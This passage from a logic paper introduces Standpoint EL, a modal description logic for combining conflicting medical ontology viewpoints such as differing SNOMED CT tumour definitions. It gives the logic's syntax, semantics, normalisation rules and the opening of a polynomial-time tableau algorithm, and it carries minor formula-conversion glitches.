generation of various ontologies of overlapping knowledge that inevitably reflect different points of view. For instance, an initiative has attempted to integrate the FMA (Foundational Model of Anatomy), SNOMED CT, and the NCI (National Cancer Institute Thesaurus) into a single combined version called LargeBio and reported ensuing challenges [1]. In this context, frameworks supporting the integrated representation of multiple perspectives seem preferable to recording the distinct views in a detached way, but also to entirely merging them at the risk of causing inconsistencies or unintended consequences. To this end, Gomez Alvarez and Rudolph [1] proposed _standpoint logic_, a formalism inspired by the theory of supervaluationism [15] and rooted in modal logic, which allows for the simultaneous representation of multiple, potentially contradictory, viewpoints in a unified way and the establishment of alignments between them.
This is achieved by extending the base language with labelled modal operators, where propositions \(\square_{\mathbb{S}}\phi\) and \(\Diamond_{\mathbb{S}}\phi\) express information relative to the _standpoint_ \(\mathbb{S}\) and read, respectively: "according to \(\mathbb{S}\), it is _unequivocal/conceivable_ that \(\phi\)". Semantically, standpoints are represented by sets of _precisifications_,1 such that \(\square_{\mathbb{S}}\phi\) and \(\Diamond_{\mathbb{S}}\phi\) hold if \(\phi\) is true in all/some of the precisifications associated with \(\mathbb{S}\). Consider the following example. Footnote 1: Precisifications are analogous to the _worlds_ of modal-logic frameworks with possible-worlds semantics.

**Example 1** (Tumour Disambiguation).: _Two derivatives of the SNOMED CT ontology (\(\mathtt{SN}\)) model tumours differently. According to \(\mathtt{TP}\), a \(\mathtt{Tumour}\) is a process by which abnormal or damaged cells grow and multiply (1), yet according to \(\mathtt{TT}\), a \(\mathtt{Tumour}\) is a lump of tissue (2)._ \[\square_{\mathtt{TP}}[\mathtt{Tumour}\sqsubseteq\mathtt{AbnormalGrowthProcess}] \tag{1}\] \[\square_{\mathtt{TT}}[\mathtt{Tumour}\sqsubseteq\mathtt{Tissue}] \tag{2}\] _Both interpretations inherit the axioms of the original SNOMED CT (3) and are such that if according to \(\mathtt{SN}\) something is arguably both a \(\mathtt{Tumour}\) and a \(\mathtt{Tissue}\), then it (unequivocally) is a \(\mathtt{Tumour}\) according to \(\mathtt{TT}\) (4). The respective assertion is made for_ TP _(5). But_ Tissue _and_ Process _are disjoint categories according to_ SN _(6)._ \[(\mathsf{TP}\preceq\mathsf{SN})\qquad(\mathsf{TT}\preceq\mathsf{SN}) \tag{3}\] \[\lozenge_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{PhysicalObject}]\sqsubseteq\square_{\mathsf{TT}}[\mathsf{Tumour}] \tag{4}\] \[\lozenge_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{Process}]\sqsubseteq\square_{\mathsf{TP}}[\mathsf{Tumour}] \tag{5}\] \[\square_{\mathsf{SN}}[\mathsf{Tissue}\sqcap\mathsf{Process}\sqsubseteq\bot] \tag{6}\] _While clearly incompatible, both perspectives are semantically close and we can establish relations between them. For instance, we might assert that something is unequivocally the product of a_ Tumour _(process) according to_ TP _if and only if it is arguably a_ Tumour _(tissue) according to_ TT _(7). Or we may want to specify a subsumption between the classes of unequivocal instances of_ Tissue _according to_ TT _and to_ TP _(8)._ \[\square_{\mathsf{TP}}[\exists\mathsf{ProductOf.Tumour}]\equiv\lozenge_{\mathsf{TT}}[\mathsf{Tumour}] \tag{7}\] \[\square_{\mathsf{TT}}[\mathsf{Tissue}]\sqsubseteq\square_{\mathsf{TP}}[\mathsf{Tissue}] \tag{8}\] _When recording clinical findings, clinicians may use ambiguous language, so an automated knowledge extraction service may obtain the following from text and annotated scans:_ \[\square_{\mathsf{SN}}[\mathsf{Patient}(p1),\,\mathsf{HasPart}(p1,a),\,\mathsf{Colon}(a)] \tag{9}\] \[\lozenge_{\mathsf{SN}}[\mathsf{HasPart}(a,b),\,\mathsf{Tumour}(b),\,\mathsf{PhysicalObject}(b)] \tag{10}\]

The logical statements (1)-(10), which formalise Example 1 by means of a standpoint-enhanced \(\mathcal{EL}\) description logic, are not inconsistent, so all axioms can be jointly represented. Let us now illustrate the use of standpoint logic for reasoning with and across individual perspectives.
**Example 2** (Continued from Example 1).: _In this case, we can disambiguate the information given by Axiom (10) using Axiom (3) and Axiom (4), which entail that according to_ TT_, \(b\) is unequivocally a tumour, \(\square_{\mathsf{TT}}\mathsf{Tumour}(b)\), and with Axiom (2) also a tissue, \(\square_{\mathsf{TT}}\mathsf{Tissue}(b)\). Moreover, we can use the "bridges" to switch to another perspective. From Axiom (8), it is clear that according to_ TP_, \(b\) is also a tissue, \(\square_{\mathsf{TP}}\mathsf{Tissue}(b)\), and from Axiom (7) \(b\) is the product of a tumour, \(\square_{\mathsf{TP}}\exists\mathsf{ProductOf.Tumour}(b)\). Then Axiom (1) yields_ \[\square_{\mathsf{TP}}\exists\mathsf{ProductOf.(Tumour}\sqcap\mathsf{ AbnormalGrowthProcess})(b).\] _The statement \(\square_{\mathsf{SN}}[\mathsf{Tumour}\sqcap\mathsf{Process}](d)\), in contrast, will trigger an inconsistency thanks to Axiom (6), which prevents the evaluation of_ Tumour _simultaneously as a_ Tissue _and a_ Process _and Axiom (2), which states that according to some interpretations, a_ Tumour _is a_ Tissue_. Finally, a user (e.g. a specific_ clinic_,_ CL_) may inherit the_ NOMED CT \((\mathsf{CL}\preceq\mathsf{SN})\) _and establish further axioms, e.g._ \[\square_{\mathsf{CL}}[\mathsf{Patient}\sqcap\exists\mathsf{HasPart.(Colon}\sqcap\lozenge_{\mathsf{SN}}\exists\mathsf{HasPart.Tumour})\sqsubseteq\] \[\exists\mathsf{AssociatedWith.ColonCancerRisk}],\] _to identify patients with cancer risk. Here, one can infer with Ax. (9) that \(\square_{\mathsf{CL}}\exists\mathsf{AssociatedWith.ColonCancerRisk}(p1)\). \(\lozenge\)_ The need of handling multiple perspectives in the Semantic Web has led to several (non-modal) logic-based proposals. The closest regarding goals are multi-viewpoint ontologies [11, 12], which model the intuition of viewpoints in a tailored extension of OWL for which no complexity bounds are given. Similar problems are also addressed in the more extensive work on contextuality (e.g. C-OWL and Distributed ontologies [1, 1] and the Contextualised Knowledge Repository (CKR) [2]). These frameworks focus on contextual and distributed reasoning and range between different levels of expressivity for modelling the structure of contexts and the bridges between them. In the context of scalable reasoning, one should highlight the implementations that provide support for OWL2-RL based CKR defeasible reasoning [1]. As for modal logics, their suitability to model perspectives and contexts in a natural way is obvious [23, 13, 14], they are well-known in the community and their semantics is well-understood. Yet, the interplay between DL constructs and modalities is often not well-behaved and can easily endanger the decidability of reasoning tasks or increase their complexity [1, 15, 16]. Notable examples are NExpTime-completeness of the multi-modal description logic \(\mathbf{K}_{\mathcal{ALC}}\)[11] and 2ExpTime-completeness of \(\mathcal{ALC}_{\mathcal{ALC}}\)[23], a modal contextual logic framework in the style proposed by McCarthy [15]. In this work, we focus on the framework of _standpoint logics_[14], which are modal logics, too, but come with a simplified Kripke semantics. Recently, Gomez Alvarez _et al._[14] introduced _First-Order_ Standpoint Logic (FOSL) and showed favourable complexity results for its _sentential_ fragments,2 which disallow modal operators being applied to formulas with free variables. 
In particular, adding sentential standpoints does not increase the complexity for fragments that are NP-_hard_. Yet, a fine-grained terminological alignment between different perspectives requires concepts preceded by modal operators, as in Axiom (7), leading to non-sentential fragments of FOSL. Footnote 2: This includes the sentential standpoint variant of the expressive DL \(\mathcal{SROIQb}_{s}\), a logical basis of OWL 2 DL [13]. Our paper is structured as follows. After introducing the syntax and semantics of Standpoint \(\mathcal{EL}\) (\(\mathbb{S}_{\mathcal{EL}}\)) and a suitable normal form (Section 2), we establish our main result: satisfiability checking in \(\mathbb{S}_{\mathcal{EL}}\) is in PTime. We show this by providing a worst-case optimal tableau-based algorithm (Section 3) that takes inspiration from the _quasi-model_-based methods [13] as used for \(K_{\mathcal{ALC}}\)[11], but differs in its specifics. Our approach builds a _quasi-model_ from a graph of _(quasi) domain elements_, which are annotated with various constraints, to then reconstruct the worlds or, in our case, precisifications. We also show that introducing additional features such as empty standpoints, rigid roles, and nominals makes standard reasoning tasks intractable (Section 4). In Section 5, we conclude the paper with a discussion of future work, including efficient approaches for reasoner implementations. Altogether, this paper provides a clear pathway for making scalable multi-perspective ontology management possible. An extended version of the paper with proofs of all results is available as a technical appendix.

## 2 Syntax, Semantics, and Normalisation

We now introduce syntax and semantics of Standpoint \(\mathcal{EL}\) (referred to as \(\mathbb{S}_{\mathcal{EL}}\)) and propose a normal form that is useful for subsequent algorithmic considerations.

**Syntax** A _Standpoint DL vocabulary_ is a traditional DL vocabulary consisting of sets \(N_{\mathsf{C}}\) of _concept names_, \(N_{\mathsf{R}}\) of _role names_, and \(N_{\mathsf{I}}\) of _individual names_, extended by an additional set \(N_{\mathsf{S}}\) of _standpoint names_ with \(*\in N_{\mathsf{S}}\). A _standpoint operator_ is of the form \(\Diamond_{\mathsf{s}}\) ("diamond") or \(\Box_{\mathsf{s}}\) ("box") with \(\mathsf{s}\in N_{\mathsf{S}}\); we use \(\odot_{\mathsf{s}}\) to refer to either. A _concept term_ is defined via \[C::=\top\ |\ \bot\ |\ A\ |\ C_{1}\sqcap C_{2}\ |\ \exists R.C\ |\ \odot_{\mathsf{s}}[C]\] where \(A\in N_{\mathsf{C}}\) and \(R\in N_{\mathsf{R}}\). A _general concept inclusion (GCI)_ is of the form \(\odot_{\mathsf{s}}[C\sqsubseteq D]\), where \(C\) and \(D\) are concept terms.3 A _concept assertion_ is of the form \(\odot_{\mathsf{s}}[C(a)]\) while a _role assertion_ is of the form \(\odot_{\mathsf{s}}[R(a,b)]\), where \(a,b\in N_{\mathsf{I}}\), \(C\) is a concept term, and \(R\in N_{\mathsf{R}}\). A _sharpening statement_ is of the form \(\mathsf{s}\preceq\mathsf{s}^{\prime}\) where \(\mathsf{s},\mathsf{s}^{\prime}\in N_{\mathsf{S}}\). Footnote 3: The square brackets \([\ldots]\) indicate the scope of the modality, as the same modalities may be used inside concept terms. An \(\mathbb{S}_{\mathcal{EL}}\) _knowledge base_ is a tuple \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\), where \(\mathcal{T}\) is a set of GCIs, called _TBox_; \(\mathcal{A}\) is a set of (concept or role) assertions, called _ABox_; and \(\mathcal{S}\) is a set of sharpening statements, called _SBox_.
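As an illustration only (this is not part of the formalism, and all class and field names below are our own), the abstract syntax just introduced could be captured by a few simple data types; the last line shows how an axiom such as (2) from Example 1 would be represented.

```python
from dataclasses import dataclass
from typing import Union

# Concept terms:  C ::= ⊤ | ⊥ | A | C1 ⊓ C2 | ∃R.C | ⊙_s[C]
@dataclass(frozen=True)
class Top:
    pass

@dataclass(frozen=True)
class Bottom:
    pass

@dataclass(frozen=True)
class ConceptName:
    name: str                   # A ∈ N_C

@dataclass(frozen=True)
class Conjunction:
    left: "Concept"
    right: "Concept"

@dataclass(frozen=True)
class Exists:
    role: str                   # R ∈ N_R
    filler: "Concept"

@dataclass(frozen=True)
class Modal:                    # □_s[C] if box else ◇_s[C]
    box: bool
    standpoint: str             # s ∈ N_S, '*' for the universal standpoint
    inner: "Concept"

Concept = Union[Top, Bottom, ConceptName, Conjunction, Exists, Modal]

# Axioms: modalised GCIs/assertions and sharpening statements
@dataclass(frozen=True)
class GCI:                      # ⊙_s[C ⊑ D]
    box: bool
    standpoint: str
    lhs: Concept
    rhs: Concept

@dataclass(frozen=True)
class ConceptAssertion:         # ⊙_s[C(a)]
    box: bool
    standpoint: str
    concept: Concept
    individual: str             # a ∈ N_I

@dataclass(frozen=True)
class RoleAssertion:            # ⊙_s[R(a,b)]
    box: bool
    standpoint: str
    role: str
    subject: str
    obj: str

@dataclass(frozen=True)
class Sharpening:               # s ≼ s'
    narrower: str
    broader: str

# Axiom (2) of Example 1:  □_TT[Tumour ⊑ Tissue]
axiom_2 = GCI(box=True, standpoint="TT",
              lhs=ConceptName("Tumour"), rhs=ConceptName("Tissue"))
```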
We refer to arbitrary statements from \(\mathcal{K}\) as _axioms_. Since the axiom types in \(\mathcal{S}\), \(\mathcal{T}\), and \(\mathcal{A}\) are syntactically well-distinguished, we sometimes identify \(\mathcal{K}\) with \(\mathcal{S}\cup\mathcal{T}\cup\mathcal{A}\). Note that all axioms except sharpening statements are preceded by modal operators (_"modalised"_ for short). In case the preceding operator happens to be \(\Box_{*}\), we may omit it.

**Semantics** The semantics of Standpoint \(\mathcal{EL}\) is defined via standpoint structures. Given a Standpoint DL vocabulary \(\langle N_{\mathsf{C}},N_{\mathsf{R}},N_{\mathsf{I}},N_{\mathsf{S}}\rangle\), a _description logic standpoint structure_ is a tuple \(\mathfrak{D}=\langle\Delta,\Pi,\sigma,\gamma\rangle\) where:

* \(\Delta\) is a non-empty set, the _domain_ of \(\mathfrak{D}\);
* \(\Pi\) is a set, called the _precisifications_ of \(\mathfrak{D}\);
* \(\sigma\) is a function mapping each standpoint symbol to a non-empty subset of \(\Pi\);4 Footnote 4: As shown in Section 4, allowing for "empty standpoints" immediately incurs intractability, even for an otherwise empty vocabulary.
* \(\gamma\) is a function mapping each precisification from \(\Pi\) to an "ordinary" DL interpretation \(\mathcal{I}=\langle\Delta,\cdot^{\mathcal{I}}\rangle\) over the domain \(\Delta\), where the interpretation function \(\cdot^{\mathcal{I}}\) maps:
  * each concept name \(A\in N_{\mathsf{C}}\) to a set \(A^{\mathcal{I}}\subseteq\Delta\),
  * each role name \(R\in N_{\mathsf{R}}\) to a binary relation \(R^{\mathcal{I}}\subseteq\Delta\times\Delta\),
  * each individual name \(a\in N_{\mathsf{I}}\) to an element \(a^{\mathcal{I}}\in\Delta\),

and we require \(a^{\gamma(\pi)}=a^{\gamma(\pi^{\prime})}\) for all \(\pi,\pi^{\prime}\in\Pi\) and \(a\in N_{\mathsf{I}}\). Note that by this definition, individual names (also referred to as constants) are interpreted rigidly, i.e., each individual name \(a\) is assigned the same \(a^{\gamma(\pi)}\in\Delta\) across all precisifications \(\pi\in\Pi\). We will refer to this uniform \(a^{\gamma(\pi)}\) by \(a^{\mathfrak{D}}\). For each \(\pi\in\Pi\), the interpretation mapping \(\mathcal{I}=\gamma(\pi)\) is extended to concept terms via structural induction as follows: \[\top^{\mathcal{I}}:=\Delta\qquad\bot^{\mathcal{I}}:=\emptyset\qquad(C_{1}\sqcap C_{2})^{\mathcal{I}}:=C_{1}^{\mathcal{I}}\cap C_{2}^{\mathcal{I}}\] \[(\exists R.C)^{\mathcal{I}}:=\left\{\delta\in\Delta\ \middle|\ \langle\delta,\varepsilon\rangle\in R^{\mathcal{I}}\text{ for some }\varepsilon\in C^{\mathcal{I}}\right\}\] \[(\Box_{\mathsf{s}}C)^{\mathcal{I}}:=\bigcap_{\pi^{\prime}\in\sigma(\mathsf{s})}C^{\gamma(\pi^{\prime})}\qquad(\Diamond_{\mathsf{s}}C)^{\mathcal{I}}:=\bigcup_{\pi^{\prime}\in\sigma(\mathsf{s})}C^{\gamma(\pi^{\prime})}\] We observe that modalised concepts \(\odot_{\mathsf{s}}C\) are interpreted uniformly across all precisifications \(\pi\in\Pi\), which allows us to denote their extensions with \((\odot_{\mathsf{s}}C)^{\mathfrak{D}}\). A DL standpoint structure \(\mathfrak{D}\) _satisfies a sharpening statement_ \(\mathsf{s}\preceq\mathsf{s}^{\prime}\), written as \(\mathfrak{D}\models\mathsf{s}\preceq\mathsf{s}^{\prime}\), iff \(\sigma(\mathsf{s})\subseteq\sigma(\mathsf{s}^{\prime})\).
For the other axiom types, satisfaction by \(\mathfrak{D}\) is defined as follows: \[\mathfrak{D}\models\Box_{\mathsf{s}}[C\sqsubseteq D]:\Longleftrightarrow C^{\gamma(\pi)}\subseteq D^{\gamma(\pi)}\text{ for each }\pi\in\sigma(\mathsf{s})\] \[\mathfrak{D}\models\Diamond_{\mathsf{s}}[C\sqsubseteq D]:\Longleftrightarrow C^{\gamma(\pi)}\subseteq D^{\gamma(\pi)}\text{ for some }\pi\in\sigma(\mathsf{s})\] \[\mathfrak{D}\models\Box_{\mathsf{s}}[C(a)]:\Longleftrightarrow a^{\mathfrak{D}}\in\bigcap_{\pi\in\sigma(\mathsf{s})}C^{\gamma(\pi)}\ \big(=(\Box_{\mathsf{s}}C)^{\mathfrak{D}}\big)\] \[\mathfrak{D}\models\Diamond_{\mathsf{s}}[C(a)]:\Longleftrightarrow a^{\mathfrak{D}}\in\bigcup_{\pi\in\sigma(\mathsf{s})}C^{\gamma(\pi)}\ \big(=(\Diamond_{\mathsf{s}}C)^{\mathfrak{D}}\big)\] \[\mathfrak{D}\models\Box_{\mathsf{s}}[R(a,b)]:\Longleftrightarrow\langle a^{\mathfrak{D}},b^{\mathfrak{D}}\rangle\in\bigcap_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] \[\mathfrak{D}\models\Diamond_{\mathsf{s}}[R(a,b)]:\Longleftrightarrow\langle a^{\mathfrak{D}},b^{\mathfrak{D}}\rangle\in\bigcup_{\pi\in\sigma(\mathsf{s})}R^{\gamma(\pi)}\] As usual, \(\mathfrak{D}\) is a _model of \(\mathcal{S}\)_ iff it satisfies every sharpening statement in \(\mathcal{S}\); it is a _model of \(\mathcal{T}\)_ iff it satisfies every GCI \(\tau\in\mathcal{T}\); it is a _model of \(\mathcal{A}\)_ iff it satisfies every assertion \(\alpha\in\mathcal{A}\); and it is a _model of \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\)_ (written \(\mathfrak{D}\models\mathcal{K}\)) iff it is a model of \(\mathcal{S}\) and a model of \(\mathcal{T}\) and a model of \(\mathcal{A}\).

Our investigations regarding reasoning in \(\mathbb{S}_{\mathcal{EL}}\) will focus on standpoint versions of the well-known standard reasoning tasks, and we will make use of variations of established techniques to (directly or indirectly) reduce all of them to the first.

**Knowledge base satisfiability:** Given a knowledge base \(\mathcal{K}\), is there a DL standpoint structure \(\mathfrak{D}\) such that \(\mathfrak{D}\models\mathcal{K}\)?

**Axiom entailment:** Given \(\mathcal{K}\) and some SBox, TBox, or ABox axiom \(\phi\), does \(\mathcal{K}\models\phi\) hold, i.e., does every model of \(\mathcal{K}\) satisfy \(\phi\)?

#### Normalisation

Before we can describe a PTime algorithm for checking satisfiability of \(\mathbb{S}_{\mathcal{EL}}\) knowledge bases, we need to introduce an appropriate normal form.
**Definition 1** (Normal Form of \(\mathbb{S}_{\mathcal{EC}}\) Knowledge Bases).: _A TBox \(\mathcal{T}\) is in normal form iff, for all its GCIs \(\Box_{\mathsf{s}}[C\sqsubseteq D]\), \(C\) is of the form \(A\), \(\exists R.A\) or \(A\sqcap A^{\prime}\) with \(A,A^{\prime}\!\in\!N_{\mathsf{C}}\cup\{\top\}\) and \(D\) is of the form \(B\), \(\exists R.B\), \(\Diamond_{\mathsf{s}^{\prime}}B\) or \(\Box_{\mathsf{s}^{\prime}}B\) with \(B\!\in\!N_{\mathsf{C}}\cup\{\bot\}\), where \(R\in N_{\mathsf{R}}\), and \(\mathtt{s},\mathtt{s}^{\prime}\in N_{\mathsf{S}}\). An ABox \(\mathcal{A}\) is in normal form iff all assertions have the form \(\Box_{\mathsf{s}}[A(a)]\) or \(\Box_{\mathsf{s}}[R(a,b)]\) for \(a,b\!\in\!N_{\mathsf{R}}\), \(A\!\in\!N_{\mathsf{C}}\), and \(R\!\in\!N_{\mathsf{R}}\)._ For a given \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}=\langle\mathcal{S},\mathcal{T},\mathcal{A}\rangle\), we can compute its normal form by exhaustively applying the following transformation rules (where "rule application" means that the axiom on the left-hand side is replaced with the set of axioms on the right-hand side): \[\Diamond_{\mathsf{s}}[C(a)] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[C(a)]\} \tag{11}\] \[\Diamond_{\mathsf{s}}[R(a,b)] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[R(a,b)]\}\] (12) \[\Diamond_{\mathsf{s}}[C\sqsubseteq D] \to \{\mathsf{v}\!\prec\!\mathsf{s},\Box_{\mathsf{s}}[C\sqsubseteq D]\}\] (13) \[\Box_{\mathsf{s}}[\bar{C}(a)] \to \{\Box_{\mathsf{s}}[A(a)],\Box_{\mathsf{s}}[A\sqsubseteq\bar{C}]\}\] (14) \[\Box_{\mathsf{s}}[B\sqsubseteq\exists R.C] \to \{\Box_{\mathsf{s}}[B\sqsubseteq\exists R.A],\Box_{\mathsf{s}}[A \sqsubseteq\bar{C}]\}\] (15) \[\Box_{\mathsf{s}}[B\sqsubseteq C\sqcap D] \to \{\Box_{\mathsf{s}}[B\sqsubseteq A],\Box_{\mathsf{s}}[A\sqsubseteq C ],\Box_{\mathsf{s}}[A\sqsubseteq D]\}\] (16) \[\Box_{\mathsf{s}}[C\sqsubseteq\Diamond_{\mathsf{s}}\bar{D}] \to \{\Box_{\mathsf{s}}[C\sqsubseteq_{\mathsf{s}}A],\Box_{\mathsf{s}}[A \sqsubseteq\bar{D}]\}\] (17) \[\Box_{\mathsf{s}}[C\sqsubseteq\top] \to \emptyset\quad\text{ and }\quad\Box_{\mathsf{s}}[\bot\sqsubseteq D]\to\emptyset\] (18) \[\Box_{\mathsf{s}}[\bar{3}R.\bar{C}\sqsubseteq D] \to \{\Box_{\mathsf{s}}[\bar{C}\sqsubseteq A],\Box_{\mathsf{s}}[\exists R.A\sqsubseteq D]\}\] (19) \[\Box_{\mathsf{s}}[\bar{C}\sqcap D\sqsubseteq E] \to \{\Box_{\mathsf{s}}[\bar{C}\sqsubseteq A],\Box_{\mathsf{s}}[A \sqcap D\sqsubseteq E]\}\] (20) \[\Box_{\mathsf{s}}[\Diamond_{\mathsf{s}}C\sqsubseteq D] \to \{\Box_{\mathsf{s}}[C\sqsubseteq\bot A],\Box_{\mathsf{s}}[A \sqsubseteq D]\}\] (21) \[\Box_{\mathsf{s}}[\Box_{\mathsf{u}}C\sqsubseteq D] \to \{\mathsf{v}_{0}\preceq\mathsf{u},\mathsf{v}_{1}\preceq\mathsf{u}, \Box_{\mathsf{u}}[C\sqsubseteq A],\] (22) \[\Box_{\mathsf{s}}[\Diamond_{\mathsf{v}_{0}}A\sqcap\Diamond_{ \mathsf{v}_{1}}A\sqsubseteq D]\}\] Therein, \(\bar{C}\) and \(\bar{D}\) stand for complex concept terms not contained in \(N_{\mathsf{C}}\!\cup\!\{\top\}\), and each occurrence of \(A\) on a right-hand side denotes the introduction of a fresh concept name; likewise, \(\mathsf{v}\), \(\mathsf{v}_{0}\), and \(\mathsf{v}_{1}\) denote of a fresh standpoint name. Rule (20) is applied modulo commutativity of \(\sqcap\). Most of the transformation rules should be intuitive (keep in mind that standpoints must be nonempty). A notable exception is Rule (22), which is crucial to remove boxes occurring with negative polarity. 
It draws some high-level inspiration from existing work on non-vacuous left-hand-side universal quantifiers in Horn DLs [1], yet the argument for its correctness requires a more intricate model-theoretic construction and hinges on "Hornness" of \(\mathcal{K}\) and nonemptiness of standpoints. A careful analysis yields that the transformation has the desired semantic and computational properties. **Lemma 1**.: _Every \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}\) can be transformed into a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}^{\prime}\) in normal form such that:_ * \(\mathcal{K}^{\prime}\) _is a_ \(\mathbb{S}_{\mathcal{EC}}\)_-conservative extension of_ \(\mathcal{K}\)_,_ * _the size of_ \(\mathcal{K}^{\prime}\) _is at most linear in the size of_ \(\mathcal{K}\)_, and_ * _the transformation can be computed in_ PTime_._ While \(\mathcal{K}^{\prime}\) being a \(\mathbb{S}_{\mathcal{EC}}\)-conservative extension of \(\mathcal{K}\) brings about various valuable properties, what matters for our purposes is that this implies equisatisfiability of \(\mathcal{K}\) and \(\mathcal{K}^{\prime}\), thus we will not go into details about conservative extensions. ## 3 A Tableau Algorithm for Standpoint \(\mathcal{EC}\) We present a PTime tableau decision algorithm for \(\mathbb{S}_{\mathcal{EC}}\). Complexity-optimal tableau algorithms have been proposed for description logics with modal operators applied to concepts and axioms such as \(\mathbf{K}_{\mathcal{ALC}}\)[10], which is known to be in NExpTime. Our case cannot be treated in the same way, as we need to take greater care to show tractability in the end. Lutz _et al._[20] build a "quasi-model" from a tree of "quasi-worlds", which is not as easily applicable in our case, so we follow a dual approach: we will build a _quasi-model_ from a completion graph of _(quasi) domain elements_, where each of the latter is associated to a constraint system with assembled information regarding one individual's specifics in each precisification. We begin with some definitions. Given a \(\mathbb{S}_{\mathcal{EC}}\) knowledge base \(\mathcal{K}\), denote by * \(\mathsf{ST}_{\mathcal{K}}\) the elements of \(N_{\mathsf{S}}\) occurring in \(\mathcal{K}\) together with \(*\), * \(\mathsf{IN}_{\mathcal{K}}\) the set of all individual names occurring in \(\mathcal{K}\), * \(\mathsf{BC}_{\mathcal{K}}\) (_basic concepts_) the concept names used in \(\mathcal{K}\), plus \(\top\), * \(\mathsf{C}_{\mathcal{K}}\) the set of concept terms used in \(\mathcal{K}\) (with \(\mathsf{BC}_{\mathcal{K}}\subseteq\mathsf{C}_{\mathcal{K}}\)), * \(\mathsf{SF}_{\mathcal{K}}\) the set of _subformulas_ of \(\mathcal{K}\), consisting of all axioms of \(\mathcal{K}\) with and without their outer standpoint modality. A _constraint_ for \(\mathcal{K}\) is of the form \((x\!:\!C)\), \((x\!:\!a)\), \((x\!:\!\phi)\), or \((x\!:\!\mathsf{s})\),5 where \(x\) is a variable, \(C\in\mathsf{C}_{\mathcal{K}}\) a concept, \(a\in\mathsf{IN}_{\mathcal{K}}\) an individual, \(\phi\in\mathsf{SF}_{\mathcal{K}}\) a formula, and \(\mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\) a standpoint name. _Constraint systems_ are finite sets of constraints. Footnote 5: For better legibility, we will sometimes omit the parentheses. 
**Definition 2** (Initial Constraint System for \(\mathcal{K}\)).: _The initial constraint system for \(\mathcal{K}\), called \(S^{\mathcal{K}}_{0}\), is the set_ \[\{\,x_{\mathsf{s}}\!:\!*,\ x_{\mathsf{s}}\!:\!\top,\ x_{\mathsf{s}}\!:\!\phi,\ x_{\mathsf{s}}\!:\!\mathsf{s}\ \mid\ \phi\in\mathcal{K},\ \mathsf{s}\in\mathsf{ST}_{\mathcal{K}}\,\}.\] _A constraint system for \(\mathcal{K}\) is a finite set \(S\) of constraints for \(\mathcal{K}\) such that \(S^{\mathcal{K}}_{0}\subseteq S\) and \(\{x\!:\!*,\ x\!:\!\top\}\subseteq S\) for each \(x\) in \(S\). For a variable \(x\), let \(\mathsf{st}_{S}(x)=\{\mathsf{s}\mid(x\!:\!\mathsf{s})\in S\}\) be the standpoint signature of \(x\) in \(S\). \(\Diamond\)_ Intuitively, each constraint system \(S\) produced by the algorithm corresponds to a domain element \(\varepsilon\in\Delta\) and each variable \(x\) in \(S\) corresponds to some precisification \(\pi\). Moreover, each constraint \(x\!:\!X\) in \(S\) encodes information about \(\varepsilon\) in \(\pi\): a constraint \(x\!:\!C\) records that \(\varepsilon\) belongs to the concept \(C\) in \(\pi\), \(x\!:\!a\) that \(\varepsilon\) represents the individual \(a\), \(x\!:\!\phi\) that the axiom \(\phi\) holds in \(\pi\), and \(x\!:\!\mathsf{s}\) that \(\pi\) belongs to the standpoint \(\mathsf{s}\). For convenience of presentation, we use the shortcut \(\mathsf{st}_{\varepsilon}(v)\) for \(\mathsf{st}_{\mathcal{S}(\varepsilon)}(v)\) and for any \(\mathbf{CG}=\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R}\rangle\), we will refer to all \(\varepsilon\in\Delta\) simply as elements of \(\mathbf{CG}\). \(\mathbf{CG}\) is said to be _locally complete_ iff for every element \(\varepsilon\) in \(\mathbf{CG}\), \(\mathcal{S}(\varepsilon)\) is complete, and we call \(\mathbf{CG}\) _globally complete_ iff it is locally complete and no global completion rule (see Figure 1) is applicable to \(\mathbf{CG}\) as a whole. Intuitively, the next definition poses some global requirements for \(\mathbf{CG}\) to warrant its eligibility as a model-substitute. **Definition 4** (Coherence).: _Let \(\mathbf{CG}=\langle\Delta,\mathcal{S},\mathcal{L},\mathcal{R}\rangle\) be a completion graph for \(\mathcal{K}\). \(\mathbf{CG}\) is called coherent iff_ * _for each_ \(a\in\mathsf{IN}_{\mathcal{K}}\) _there is a unique element_ \(\varepsilon_{a}\in\Delta\) _such that_ \((v\!:\!a)\in\mathcal{S}(\varepsilon_{a})\) _for all variables_ \(v\) _in_ \(\mathcal{S}(\varepsilon_{a})\)_,_ * _for each_ \(\varepsilon,\varepsilon^{\prime}\in\Delta\) _and each variable_ \(v\) _contained in_ \(\mathcal{S}(\varepsilon)\)_,_ \(\mathcal{S}(\varepsilon^{\prime})\) _contains some_ \(v^{\prime}\) _such that_ \(\mathsf{st}_{\varepsilon}(v)=\mathsf{st}_{\varepsilon^{\prime}}(v^{\prime})\)_, and_ * _if_ \((v\!:\!\phi)\in\mathcal{S}(\varepsilon)\) _and_ \(\mathsf{st}_{\varepsilon}(v)=\mathsf{st}_{\varepsilon^{\prime}}(v^{\prime})\)_, then_ \((v^{\prime}\!:\!\phi)\in\mathcal{S}(\varepsilon^{\prime})\)_._ As usual in tableaux, inconsistencies emerge as clashes. **Definition 5** (Clash).: _A clash is a constraint of the form \((x\!:\!\bot)\). A completion graph \(\mathbf{CG}\) is said to contain a clash iff \(\mathcal{S}(\varepsilon)\) does for some \(\varepsilon\) in \(\mathbf{CG}\).
